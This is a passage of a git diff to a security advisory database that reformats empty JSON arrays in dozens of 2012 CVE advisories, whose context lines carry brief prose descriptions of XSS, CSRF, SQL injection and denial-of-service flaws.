Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 on z/OS, in certain configurations involving Federated Repositories for IIOP connections and Optimized Local Adapters, does not perform CBIND checks, which allows local users to bypass intended access restrictions, and read or modify application data, via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-92r4-wxv7-q9rx/GHSA-92r4-wxv7-q9rx.json b/advisories/unreviewed/2022/05/GHSA-92r4-wxv7-q9rx/GHSA-92r4-wxv7-q9rx.json index e27a41cc412..2ac7d96247d 100644 --- a/advisories/unreviewed/2022/05/GHSA-92r4-wxv7-q9rx/GHSA-92r4-wxv7-q9rx.json +++ b/advisories/unreviewed/2022/05/GHSA-92r4-wxv7-q9rx/GHSA-92r4-wxv7-q9rx.json @@ -7,12 +7,8 @@ "CVE-2012-2728" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Node Hierarchy module 6.x-1.x before 6.x-1.5 for Drupal allow remote attackers to hijack the authentication of administrators for requests that change a node hierarchy position via an (1) up or (2) down action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9324-v825-64hv/GHSA-9324-v825-64hv.json b/advisories/unreviewed/2022/05/GHSA-9324-v825-64hv/GHSA-9324-v825-64hv.json index 76db5ec9616..890fdd5529e 100644 --- a/advisories/unreviewed/2022/05/GHSA-9324-v825-64hv/GHSA-9324-v825-64hv.json +++ b/advisories/unreviewed/2022/05/GHSA-9324-v825-64hv/GHSA-9324-v825-64hv.json @@ -7,12 +7,8 @@ "CVE-2012-3297" ], "details": "Cross-site scripting (XSS) vulnerability in the embedded HTTP server in the Service Console in IBM Tivoli Monitoring 6.2.2 before 6.2.2-TIV-ITM-FP0009 and 6.3.2 before 6.2.3-TIV-ITM-FP0001 allows remote attackers to inject arbitrary web script or HTML via a crafted URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-933c-wxww-rpjp/GHSA-933c-wxww-rpjp.json b/advisories/unreviewed/2022/05/GHSA-933c-wxww-rpjp/GHSA-933c-wxww-rpjp.json index eb14778df62..65cd44e7826 100644 --- a/advisories/unreviewed/2022/05/GHSA-933c-wxww-rpjp/GHSA-933c-wxww-rpjp.json +++ b/advisories/unreviewed/2022/05/GHSA-933c-wxww-rpjp/GHSA-933c-wxww-rpjp.json @@ -7,12 +7,8 @@ "CVE-2012-1117" ], "details": "Cross-site scripting (XSS) vulnerability in Joomla! 2.5.0 and 2.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-93cp-hj73-6xrq/GHSA-93cp-hj73-6xrq.json b/advisories/unreviewed/2022/05/GHSA-93cp-hj73-6xrq/GHSA-93cp-hj73-6xrq.json index 8c7d229a625..0469b6d51fb 100644 --- a/advisories/unreviewed/2022/05/GHSA-93cp-hj73-6xrq/GHSA-93cp-hj73-6xrq.json +++ b/advisories/unreviewed/2022/05/GHSA-93cp-hj73-6xrq/GHSA-93cp-hj73-6xrq.json @@ -7,12 +7,8 @@ "CVE-2012-2917" ], "details": "Cross-site scripting (XSS) vulnerability in the Share and Follow plugin 1.80.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the CDN API Key (cnd-key) in a share-and-follow-menu page to wp-admin/admin.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-945c-gxr5-cr85/GHSA-945c-gxr5-cr85.json b/advisories/unreviewed/2022/05/GHSA-945c-gxr5-cr85/GHSA-945c-gxr5-cr85.json index 7a8fee261a4..0e2ac00aa34 100644 --- a/advisories/unreviewed/2022/05/GHSA-945c-gxr5-cr85/GHSA-945c-gxr5-cr85.json +++ b/advisories/unreviewed/2022/05/GHSA-945c-gxr5-cr85/GHSA-945c-gxr5-cr85.json @@ -7,12 +7,8 @@ "CVE-2012-3094" ], "details": "The VPN downloader in the download_install component in Cisco AnyConnect Secure Mobility Client 3.1.x before 3.1.00495 on Linux accepts arbitrary X.509 server certificates without user interaction, which allows remote attackers to obtain sensitive information via vectors involving an invalid certificate, aka Bug ID CSCua11967.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-946x-98h5-x8xq/GHSA-946x-98h5-x8xq.json b/advisories/unreviewed/2022/05/GHSA-946x-98h5-x8xq/GHSA-946x-98h5-x8xq.json index 46c70d06c4b..55b23333131 100644 --- a/advisories/unreviewed/2022/05/GHSA-946x-98h5-x8xq/GHSA-946x-98h5-x8xq.json +++ b/advisories/unreviewed/2022/05/GHSA-946x-98h5-x8xq/GHSA-946x-98h5-x8xq.json @@ -7,12 +7,8 @@ "CVE-2012-2910" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in SiliSoftware phpThumb() 1.7.11 allow remote attackers to inject arbitrary web script or HTML via the (1) dir parameter to demo/phpThumb.demo.random.php or (2) title parameter to demo/phpThumb.demo.showpic.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-94ph-jfqr-5g5h/GHSA-94ph-jfqr-5g5h.json b/advisories/unreviewed/2022/05/GHSA-94ph-jfqr-5g5h/GHSA-94ph-jfqr-5g5h.json index 2ac097467a3..b53530a28bd 100644 --- a/advisories/unreviewed/2022/05/GHSA-94ph-jfqr-5g5h/GHSA-94ph-jfqr-5g5h.json +++ b/advisories/unreviewed/2022/05/GHSA-94ph-jfqr-5g5h/GHSA-94ph-jfqr-5g5h.json @@ -7,12 +7,8 @@ "CVE-2012-1211" ], "details": "Cross-site scripting (XSS) vulnerability in pfile/kommentar.php in Powie pFile 1.02 allows remote attackers to inject arbitrary web script or HTML via the filecat parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-95xj-v76h-9x4x/GHSA-95xj-v76h-9x4x.json b/advisories/unreviewed/2022/05/GHSA-95xj-v76h-9x4x/GHSA-95xj-v76h-9x4x.json index 898a99f1b13..e8ada4c5a4b 100644 --- a/advisories/unreviewed/2022/05/GHSA-95xj-v76h-9x4x/GHSA-95xj-v76h-9x4x.json +++ b/advisories/unreviewed/2022/05/GHSA-95xj-v76h-9x4x/GHSA-95xj-v76h-9x4x.json @@ -7,12 +7,8 @@ "CVE-2012-2922" ], "details": "The request_path function in includes/bootstrap.inc in Drupal 7.14 and earlier allows remote attackers to obtain sensitive information via the q[] parameter to index.php, which reveals the installation path in an error message.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9626-mp4x-mhfv/GHSA-9626-mp4x-mhfv.json b/advisories/unreviewed/2022/05/GHSA-9626-mp4x-mhfv/GHSA-9626-mp4x-mhfv.json index c2e049c3e92..97e48138af7 100644 --- a/advisories/unreviewed/2022/05/GHSA-9626-mp4x-mhfv/GHSA-9626-mp4x-mhfv.json +++ b/advisories/unreviewed/2022/05/GHSA-9626-mp4x-mhfv/GHSA-9626-mp4x-mhfv.json @@ -7,12 +7,8 @@ "CVE-2012-2726" ], "details": "Cross-site scripting (XSS) vulnerability in the Protest module 6.x-1.x before 6.x-1.2 or 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with the \"administer protest\" permission to inject arbitrary web script or HTML via the protest_body parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9668-gp9w-hwrf/GHSA-9668-gp9w-hwrf.json b/advisories/unreviewed/2022/05/GHSA-9668-gp9w-hwrf/GHSA-9668-gp9w-hwrf.json index 55fdd48084f..09e013164bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-9668-gp9w-hwrf/GHSA-9668-gp9w-hwrf.json +++ b/advisories/unreviewed/2022/05/GHSA-9668-gp9w-hwrf/GHSA-9668-gp9w-hwrf.json @@ -7,12 +7,8 @@ "CVE-2012-3723" ], "details": "Apple Mac OS X before 10.7.5 does not properly handle the bNbrPorts field of a USB hub descriptor, which allows physically proximate attackers to execute arbitrary code or cause a denial of service (memory corruption and system crash) by attaching a USB device.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-96h6-vw4q-hj8c/GHSA-96h6-vw4q-hj8c.json b/advisories/unreviewed/2022/05/GHSA-96h6-vw4q-hj8c/GHSA-96h6-vw4q-hj8c.json index 38d7618f435..8b0a7f852aa 100644 --- a/advisories/unreviewed/2022/05/GHSA-96h6-vw4q-hj8c/GHSA-96h6-vw4q-hj8c.json +++ b/advisories/unreviewed/2022/05/GHSA-96h6-vw4q-hj8c/GHSA-96h6-vw4q-hj8c.json @@ -7,12 +7,8 @@ "CVE-2012-0979" ], "details": "Cross-site scripting (XSS) vulnerability in TWiki allows remote attackers to inject arbitrary web script or HTML via the organization field in a profile, involving (1) registration or (2) editing of the user.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-96x2-w96j-h2h7/GHSA-96x2-w96j-h2h7.json b/advisories/unreviewed/2022/05/GHSA-96x2-w96j-h2h7/GHSA-96x2-w96j-h2h7.json index 6ae9ba0ef50..ad0c2cc2b64 100644 --- a/advisories/unreviewed/2022/05/GHSA-96x2-w96j-h2h7/GHSA-96x2-w96j-h2h7.json +++ b/advisories/unreviewed/2022/05/GHSA-96x2-w96j-h2h7/GHSA-96x2-w96j-h2h7.json @@ -7,12 +7,8 @@ "CVE-2012-2406" ], "details": "RealNetworks RealPlayer before 15.0.4.53, and RealPlayer SP 1.0 through 1.1.5, does not properly parse ASMRuleBook data in RealMedia files, which allows remote attackers to execute arbitrary code via a crafted file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-975g-jv28-79r2/GHSA-975g-jv28-79r2.json b/advisories/unreviewed/2022/05/GHSA-975g-jv28-79r2/GHSA-975g-jv28-79r2.json index d0ea4471c43..2d2438ae892 100644 --- a/advisories/unreviewed/2022/05/GHSA-975g-jv28-79r2/GHSA-975g-jv28-79r2.json +++ b/advisories/unreviewed/2022/05/GHSA-975g-jv28-79r2/GHSA-975g-jv28-79r2.json @@ -7,12 +7,8 @@ "CVE-2012-3312" ], "details": "The datasource definition editor in IBM InfoSphere Guardium 8.2 and earlier, when the save-password setting is enabled, transmits cleartext database credentials, which allows remote attackers to obtain sensitive information by sniffing the network.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-98vm-6j9m-69q6/GHSA-98vm-6j9m-69q6.json b/advisories/unreviewed/2022/05/GHSA-98vm-6j9m-69q6/GHSA-98vm-6j9m-69q6.json index 142b3c22d33..cdc4ca0262d 100644 --- a/advisories/unreviewed/2022/05/GHSA-98vm-6j9m-69q6/GHSA-98vm-6j9m-69q6.json +++ b/advisories/unreviewed/2022/05/GHSA-98vm-6j9m-69q6/GHSA-98vm-6j9m-69q6.json @@ -7,12 +7,8 @@ "CVE-2012-3120" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 8 allows remote attackers to affect availability, related to TCP/IP.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-996c-q543-vq85/GHSA-996c-q543-vq85.json b/advisories/unreviewed/2022/05/GHSA-996c-q543-vq85/GHSA-996c-q543-vq85.json index 3d273271679..89920c4d280 100644 --- a/advisories/unreviewed/2022/05/GHSA-996c-q543-vq85/GHSA-996c-q543-vq85.json +++ b/advisories/unreviewed/2022/05/GHSA-996c-q543-vq85/GHSA-996c-q543-vq85.json @@ -7,12 +7,8 @@ "CVE-2012-1934" ], "details": "SQL injection vulnerability in admin/country/edit.php in Newscoop before 3.5.5 and 4.x before 4 RC4 allows remote attackers to execute arbitrary SQL commands via the f_country_code parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-996x-56fr-67x6/GHSA-996x-56fr-67x6.json b/advisories/unreviewed/2022/05/GHSA-996x-56fr-67x6/GHSA-996x-56fr-67x6.json index dcdb8bbfbd6..48d036991eb 100644 --- a/advisories/unreviewed/2022/05/GHSA-996x-56fr-67x6/GHSA-996x-56fr-67x6.json +++ b/advisories/unreviewed/2022/05/GHSA-996x-56fr-67x6/GHSA-996x-56fr-67x6.json @@ -7,12 +7,8 @@ "CVE-2012-3952" ], "details": "Cross-site scripting (XSS) vulnerability in admin/index.php in phpList before 2.10.19 allows remote attackers to inject arbitrary web script or HTML via the unconfirmed parameter to the user page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-99cq-pmj3-v2hx/GHSA-99cq-pmj3-v2hx.json b/advisories/unreviewed/2022/05/GHSA-99cq-pmj3-v2hx/GHSA-99cq-pmj3-v2hx.json index 29fda96c640..1b586b65a70 100644 --- a/advisories/unreviewed/2022/05/GHSA-99cq-pmj3-v2hx/GHSA-99cq-pmj3-v2hx.json +++ b/advisories/unreviewed/2022/05/GHSA-99cq-pmj3-v2hx/GHSA-99cq-pmj3-v2hx.json @@ -7,12 +7,8 @@ "CVE-2012-1507" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in OrangeHRM before 2.7 allow remote attackers to inject arbitrary web script or HTML via the (1) newHspStatus parameter to plugins/ajaxCalls/haltResumeHsp.php, (2) sortOrder1 parameter to templates/hrfunct/emppop.php, or (3) uri parameter to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-99pv-r3jj-x8v5/GHSA-99pv-r3jj-x8v5.json b/advisories/unreviewed/2022/05/GHSA-99pv-r3jj-x8v5/GHSA-99pv-r3jj-x8v5.json index 5393ee5af4d..ea5d5d86131 100644 --- a/advisories/unreviewed/2022/05/GHSA-99pv-r3jj-x8v5/GHSA-99pv-r3jj-x8v5.json +++ b/advisories/unreviewed/2022/05/GHSA-99pv-r3jj-x8v5/GHSA-99pv-r3jj-x8v5.json @@ -7,12 +7,8 @@ "CVE-2012-1498" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in Webfolio CMS 1.1.4 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) add an administrator via an add action to admin/users/add or (2) modify a web page via a save action to admin/pages/edit/web_page_name.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9c3c-25c4-7v5v/GHSA-9c3c-25c4-7v5v.json b/advisories/unreviewed/2022/05/GHSA-9c3c-25c4-7v5v/GHSA-9c3c-25c4-7v5v.json index 0cbac7134d6..0d1342b802a 100644 --- a/advisories/unreviewed/2022/05/GHSA-9c3c-25c4-7v5v/GHSA-9c3c-25c4-7v5v.json +++ b/advisories/unreviewed/2022/05/GHSA-9c3c-25c4-7v5v/GHSA-9c3c-25c4-7v5v.json @@ -7,12 +7,8 @@ "CVE-2012-0738" ], "details": "IBM Security AppScan Enterprise before 8.6.0.2 and Rational Policy Tester before 8.5.0.3 do not validate X.509 certificates during scanning, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary certificate.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9c59-3f2v-28rr/GHSA-9c59-3f2v-28rr.json b/advisories/unreviewed/2022/05/GHSA-9c59-3f2v-28rr/GHSA-9c59-3f2v-28rr.json index 0ed6b25a456..7f18e35ef46 100644 --- a/advisories/unreviewed/2022/05/GHSA-9c59-3f2v-28rr/GHSA-9c59-3f2v-28rr.json +++ b/advisories/unreviewed/2022/05/GHSA-9c59-3f2v-28rr/GHSA-9c59-3f2v-28rr.json @@ -7,12 +7,8 @@ "CVE-2012-1107" ], "details": "The analyzeCurrent function in ape/apeproperties.cpp in TagLib 1.7 and earlier allows context-dependent attackers to cause a denial of service (application crash) via a crafted sampleRate in an ape file, which triggers a divide-by-zero error.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9cj3-p33g-x9hg/GHSA-9cj3-p33g-x9hg.json b/advisories/unreviewed/2022/05/GHSA-9cj3-p33g-x9hg/GHSA-9cj3-p33g-x9hg.json index 7213a80220b..e58d67fb5d6 100644 --- a/advisories/unreviewed/2022/05/GHSA-9cj3-p33g-x9hg/GHSA-9cj3-p33g-x9hg.json +++ b/advisories/unreviewed/2022/05/GHSA-9cj3-p33g-x9hg/GHSA-9cj3-p33g-x9hg.json @@ -7,12 +7,8 @@ "CVE-2012-3438" ], "details": "The Magick_png_malloc function in coders/png.c in GraphicsMagick 6.7.8-6 does not use the proper variable type for the allocation size, which might allow remote attackers to cause a denial of service (crash) via a crafted PNG file that triggers incorrect memory allocation.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9cj5-qj56-q924/GHSA-9cj5-qj56-q924.json b/advisories/unreviewed/2022/05/GHSA-9cj5-qj56-q924/GHSA-9cj5-qj56-q924.json index 5a925e18890..d8bb218426d 100644 --- a/advisories/unreviewed/2022/05/GHSA-9cj5-qj56-q924/GHSA-9cj5-qj56-q924.json +++ b/advisories/unreviewed/2022/05/GHSA-9cj5-qj56-q924/GHSA-9cj5-qj56-q924.json @@ -7,12 +7,8 @@ "CVE-2012-2285" ], "details": "EMC Cloud Tiering Appliance (aka CTA, formerly FMA) 9.0 and earlier, and Cloud Tiering Appliance Virtual Edition (CTA/VE) 9.0 and earlier, allows remote attackers to obtain GUI administrative access by sending a crafted file during the authentication phase.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9f2v-g758-7mf3/GHSA-9f2v-g758-7mf3.json b/advisories/unreviewed/2022/05/GHSA-9f2v-g758-7mf3/GHSA-9f2v-g758-7mf3.json index c47bf5f5c63..5a92f51a321 100644 --- a/advisories/unreviewed/2022/05/GHSA-9f2v-g758-7mf3/GHSA-9f2v-g758-7mf3.json +++ b/advisories/unreviewed/2022/05/GHSA-9f2v-g758-7mf3/GHSA-9f2v-g758-7mf3.json @@ -7,12 +7,8 @@ "CVE-2012-2191" ], "details": "IBM Global Security Kit (aka GSKit) before 8.0.14.22, as used in IBM Rational Directory Server, IBM Tivoli Directory Server, and other products, does not properly validate data during execution of a protection mechanism against the Vaudenay SSL CBC timing attack, which allows remote attackers to cause a denial of service (application crash) via crafted values in the TLS Record Layer, a different vulnerability than CVE-2012-2333.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9f9q-j576-jp97/GHSA-9f9q-j576-jp97.json b/advisories/unreviewed/2022/05/GHSA-9f9q-j576-jp97/GHSA-9f9q-j576-jp97.json index 1be12d54765..de3f02556bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-9f9q-j576-jp97/GHSA-9f9q-j576-jp97.json +++ b/advisories/unreviewed/2022/05/GHSA-9f9q-j576-jp97/GHSA-9f9q-j576-jp97.json @@ -7,12 +7,8 @@ "CVE-2012-1167" ], "details": "The JBoss Server in JBoss Enterprise Application Platform 5.1.x before 5.1.2 and 5.2.x before 5.2.2, Web Platform before 5.1.2, BRMS Platform before 5.3.0, and SOA Platform before 5.3.0, when the server is configured to use the JaccAuthorizationRealm and the ignoreBaseDecision property is set to true on the JBossWebRealm, does not properly check the permissions created by the WebPermissionMapping class, which allows remote authenticated users to access arbitrary applications.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -76,9 +72,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9fqx-cr7c-jcr7/GHSA-9fqx-cr7c-jcr7.json b/advisories/unreviewed/2022/05/GHSA-9fqx-cr7c-jcr7/GHSA-9fqx-cr7c-jcr7.json index d516837b1a0..2d4c560cd88 100644 --- a/advisories/unreviewed/2022/05/GHSA-9fqx-cr7c-jcr7/GHSA-9fqx-cr7c-jcr7.json +++ b/advisories/unreviewed/2022/05/GHSA-9fqx-cr7c-jcr7/GHSA-9fqx-cr7c-jcr7.json @@ -7,12 +7,8 @@ "CVE-2012-3743" ], "details": "The System Logs implementation in Apple iOS before 6 does not restrict /var/log access by sandboxed apps, which allows remote attackers to obtain sensitive information via a crafted app that reads log files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9gqf-v3vj-g5hp/GHSA-9gqf-v3vj-g5hp.json b/advisories/unreviewed/2022/05/GHSA-9gqf-v3vj-g5hp/GHSA-9gqf-v3vj-g5hp.json index 3cffa829e23..506825c8c2a 100644 --- a/advisories/unreviewed/2022/05/GHSA-9gqf-v3vj-g5hp/GHSA-9gqf-v3vj-g5hp.json +++ b/advisories/unreviewed/2022/05/GHSA-9gqf-v3vj-g5hp/GHSA-9gqf-v3vj-g5hp.json @@ -7,12 +7,8 @@ "CVE-2012-3060" ], "details": "Cisco Unity Connection (UC) 8.6, 9.0, and 9.5 allows remote attackers to cause a denial of service (CPU consumption) via malformed UDP packets, aka Bug ID CSCtz76269.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9hgh-cv8m-c8m5/GHSA-9hgh-cv8m-c8m5.json b/advisories/unreviewed/2022/05/GHSA-9hgh-cv8m-c8m5/GHSA-9hgh-cv8m-c8m5.json index 41aeb26840d..10ac7440ca5 100644 --- a/advisories/unreviewed/2022/05/GHSA-9hgh-cv8m-c8m5/GHSA-9hgh-cv8m-c8m5.json +++ b/advisories/unreviewed/2022/05/GHSA-9hgh-cv8m-c8m5/GHSA-9hgh-cv8m-c8m5.json @@ -7,12 +7,8 @@ "CVE-2012-3142" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.5, 5.1.0, 5.2.0, and 5.3.0 through 5.3.4 allows remote authenticated users to affect confidentiality, related to BASE.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9hw9-f239-5h5h/GHSA-9hw9-f239-5h5h.json b/advisories/unreviewed/2022/05/GHSA-9hw9-f239-5h5h/GHSA-9hw9-f239-5h5h.json index 02ae0aff8da..3c2699314b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-9hw9-f239-5h5h/GHSA-9hw9-f239-5h5h.json +++ b/advisories/unreviewed/2022/05/GHSA-9hw9-f239-5h5h/GHSA-9hw9-f239-5h5h.json @@ -7,12 +7,8 @@ "CVE-2012-4050" ], "details": "Multiple unspecified vulnerabilities in Google Chrome OS before 21.0.1180.50 on the Cr-48 and Samsung Series 5 and 5 550 Chromebook platforms, and the Samsung Chromebox Series 3, have unknown impact and attack vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9j54-wmcm-g7mf/GHSA-9j54-wmcm-g7mf.json b/advisories/unreviewed/2022/05/GHSA-9j54-wmcm-g7mf/GHSA-9j54-wmcm-g7mf.json index 88064fefec0..05dc9114d94 100644 --- a/advisories/unreviewed/2022/05/GHSA-9j54-wmcm-g7mf/GHSA-9j54-wmcm-g7mf.json +++ b/advisories/unreviewed/2022/05/GHSA-9j54-wmcm-g7mf/GHSA-9j54-wmcm-g7mf.json @@ -7,12 +7,8 @@ "CVE-2012-2667" ], "details": "Session fixation vulnerability in lib/user/sfBasicSecurityUser.class.php in SensioLabs Symfony before 1.4.18 allows remote attackers to hijack web sessions via vectors related to the regenerate method and unspecified \"database backed session classes.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9m8c-wrpr-vm49/GHSA-9m8c-wrpr-vm49.json b/advisories/unreviewed/2022/05/GHSA-9m8c-wrpr-vm49/GHSA-9m8c-wrpr-vm49.json index 02b75780a5f..3dc81b246b4 100644 --- a/advisories/unreviewed/2022/05/GHSA-9m8c-wrpr-vm49/GHSA-9m8c-wrpr-vm49.json +++ b/advisories/unreviewed/2022/05/GHSA-9m8c-wrpr-vm49/GHSA-9m8c-wrpr-vm49.json @@ -7,12 +7,8 @@ "CVE-2012-3747" ], "details": "WebKit, as used in Apple iOS before 6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9mf9-j4hx-8j6j/GHSA-9mf9-j4hx-8j6j.json b/advisories/unreviewed/2022/05/GHSA-9mf9-j4hx-8j6j/GHSA-9mf9-j4hx-8j6j.json index c3a16b6c19f..c54d1dedfa1 100644 --- a/advisories/unreviewed/2022/05/GHSA-9mf9-j4hx-8j6j/GHSA-9mf9-j4hx-8j6j.json +++ b/advisories/unreviewed/2022/05/GHSA-9mf9-j4hx-8j6j/GHSA-9mf9-j4hx-8j6j.json @@ -7,12 +7,8 @@ "CVE-2012-3526" ], "details": "The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9pqq-q9h6-282w/GHSA-9pqq-q9h6-282w.json b/advisories/unreviewed/2022/05/GHSA-9pqq-q9h6-282w/GHSA-9pqq-q9h6-282w.json index 58d5ab8150c..e14e141a937 100644 --- a/advisories/unreviewed/2022/05/GHSA-9pqq-q9h6-282w/GHSA-9pqq-q9h6-282w.json +++ b/advisories/unreviewed/2022/05/GHSA-9pqq-q9h6-282w/GHSA-9pqq-q9h6-282w.json @@ -7,12 +7,8 @@ "CVE-2012-2896" ], "details": "Integer overflow in the WebGL implementation in Google Chrome before 22.0.1229.79 on Mac OS X allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 